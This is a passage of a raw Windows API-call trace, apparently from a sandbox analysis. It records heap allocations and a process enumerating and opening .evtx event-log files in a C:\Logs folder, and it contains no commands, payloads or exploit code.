RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.566] AreFileApisANSI () returned 1 [0086.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 50 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.567] AreFileApisANSI () returned 1 [0086.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0086.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46668 [0086.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46668, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 50 [0086.567] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.567] GetFileType (hFile=0x348) returned 0x1 [0086.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0086.567] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.567] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.567] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.568] CloseHandle (hObject=0x348) returned 1 [0086.568] AreFileApisANSI () returned 1 [0086.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0086.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46278 [0086.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 50 [0086.568] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.568] GetFileType (hFile=0x348) returned 0x1 [0086.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0086.568] CloseHandle (hObject=0x348) returned 1 [0086.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0086.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0086.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.569] AreFileApisANSI () returned 1 [0086.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x463c8 [0086.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x463c8, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 50 [0086.569] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.569] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.570] AreFileApisANSI () returned 1 [0086.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 52 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0086.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.571] AreFileApisANSI () returned 1 [0086.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0086.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0086.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=52 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 52 [0086.571] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.571] GetFileType (hFile=0x348) returned 0x1 [0086.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0086.571] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.571] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.571] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.571] CloseHandle (hObject=0x348) returned 1 [0086.572] AreFileApisANSI () returned 1 [0086.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x463c8, cchWideChar=52 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 52 [0086.572] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.572] GetFileType (hFile=0x348) returned 0x1 [0086.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.572] CloseHandle (hObject=0x348) returned 1 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.573] AreFileApisANSI () returned 1 [0086.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0086.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x46438, cchWideChar=52 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 52 [0086.573] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0086.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.573] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0086.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.574] HeapFree (in: hHeap=0x20000, 